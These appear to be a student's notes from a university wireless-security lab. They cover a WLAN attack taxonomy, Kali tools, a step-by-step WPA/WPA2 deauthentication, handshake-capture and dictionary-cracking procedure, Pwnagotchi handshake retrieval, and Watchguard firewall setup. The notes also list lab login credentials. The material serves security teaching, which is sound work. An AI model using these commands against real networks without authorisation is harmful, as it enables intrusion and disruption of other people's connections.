- Interrupt connection between access point and mobile device, capture reconnect to crack password
- Used captured network traffic from Riccarton Mall and crack authentication dialogues
WLAN Attack Taxonomy
Passive attacks:
- Traffic analysis
- Packet size, type, fragmentation info etc.
- APs periodically send out beacon frames
- Eavesdropping
- Requires wireless cards with passive packet sniffing (and active packet injection for active attacks)
Active attacks:
- Unauthorized access
- Masquerade as a legitimate user
- Access to wireless components may give access to wired components
- Rogue access points (Evil-Twin attack)
- Interrupt connection, then device automatically reconnects to strongest matching AP
- Man-in-the-middle attacks
- ARP spoofing - spoof MAC of access point and victim to force all traffic to pass through attacker
- Session hijacking
- Spoof MAC and force disconnect - in some architectures re-authentication not required
- Replay
- Capture authentication packets, replay then later
- Denial of Service
- Attacks against layer 1 (physical) or 2 (data link) cannot be stopped
- NZ stock exchange attack: attacked DNS server
PSK (pre-shared key) used in labs: each node has string/passphrase that is combined with network SSID to generate unique encryption key for each client and session.
Tools
Several tools available pre-installed in Kali-Linux
airmon-ng: set wireless adapter to monitor mode to sniff packets meant for other deviceskismet: wireless network detector, packet snifferiwconfig: check wireless adapter is in monitor modeairodump-ng: capture packets and display access point properties (ethernet address, channel number, speed, etc.)aireplay-ng: issue deauthentication packets and capture the automatic reconnection dialogueaircrack-ng: decrypting keys captured byaireplay-ngairbase-ng: establishing access point for evil-twin attackmacchanger: view/spoof MAC address
(‘ng’ stands for ‘next generation’ - basically version 2)
Login:
cyberlab:$CyberLab!root:toor
WPA/WPA2 Password Cracking
- Kill DHCP server:
ps-eaf | grep dhcthenkill -9 {process_id} iwconfigto find interface nameairodump-ng {wireless_interface}; scan for networks, determine channel number and MAC address (BSSID - basic service set identifier) of target APairmon-ng stop {wireless_interface}airmon-ng start {wireless_interface} {channel_number}to enable monitor mode for a specific channeliwconfigto find the new monitoring network interface’s nameairodump-ng -c {ap_channel} --bssid {ap_mac} -w {capture_file_path} {wireless_interface}- Continue running the command
BSSIDis the AP MAC,STATIONis the victim’s MAC
aireplay-ng -0 1 -a {ap_mac} -c {vicim_mac} {wireless_interface}- Send 1 de-authentication packet (
-0 1is short for--deauth=1)- The device will then automatically reconnect.
airodump-ngwill be able to capture the four-way handshake- PSK (pre-shared key) derived from passphrase. Both parties need to prove they hold the key without sending it over the wire
- The device will then automatically reconnect.
- Send 1 de-authentication packet (
- (Optional) To see it working, go to Wireshark, select correct interface (Capture -> Options), filter using
eapol(extensible authentication protocol over link layer) aircrack-ng -w {path_to_dictionary} -b {victim_mac} {capture_file_path}- Unzip gzip files:
gunzip {path} - Cracks captured password
- Unzip gzip files:
Pwnagotchi
- Connect via USB
ifconfig -a: ensure usb0 is being used as networking deviceifconfig usb0 10.0.0.1/24: set IP of devicescp -r pi@10.0.0.2:/root/handshakes ~/handshakes: copy files from Pwnagotchi to computer- Pwnagotchi contains PCAP files with format
{SSID name}_{BSSID}.pcap
- Pwnagotchi contains PCAP files with format
Enterprise Security
- External interface: network that presents the security threat
- Trusted interface: private LAN/internal interface
- Optional interface: DMZ/mixed trust area. APs go here
Watchguard:
- All-in-one firewall + switch + wireless AP
- IP address of the Watchguard device: default gateway
- Add HTTP packet filter
- Basically port filter: only allows tcp traffic in port 80
- HTTP proxy allows packet contents to be inspected
- Allow traffic From Any-Optional To Any-Trusted
- Initial connection must be from outside to inside
- Set up wireless interface
- Note IP and CIDR of interface 2
- Create new bridge with IP and CIDR from above, optional security zone and DHCP enabled
- Set interface 2 to bridge type, set bridge to the one made above
- Enable wireless AP in bridge mode (using bridge from above)
- At this point devices should be able to connect to the AP, and the firewall rule allows HTTP traffic from device to server connected to any trusted network
- WPA2 Enterprise: can either set wireless network to use Firebox DB or RADIUS server (e.g. Active Directory) for authentication
Write-up
- Explain importance of software security, brief example of experiments done in labs
- Own diagrams - no copying off internet/lab notes, or scans of hand-drawn diagrams
- References to supplement writing
- Observations: potential risks, areas of interest
- Some research and comments
- Target audience: write recommendations as if to a technical but not security focused manager
- ~2000 words
- Describe what the risks of the insecurities are
- Introduction and conclusion alone should give a good overview of problems and recommendations
Structure:
- Title
- Author
- Abstract: purpose and findings
- Introduction:
- Description of experiments, equipment, tools, techniques
- Vulnerabilities demonstrated
- Diagrams of equipment/system
- Experimental results:
- Explanation of experiments, importance of results
- A few screenshots and their explanations
- Relate to cybersecurity disasters
- Conclusions: (in)adequacy of setup results
- Comments on prevalence of security issues in current systems, organizations
- References (optional)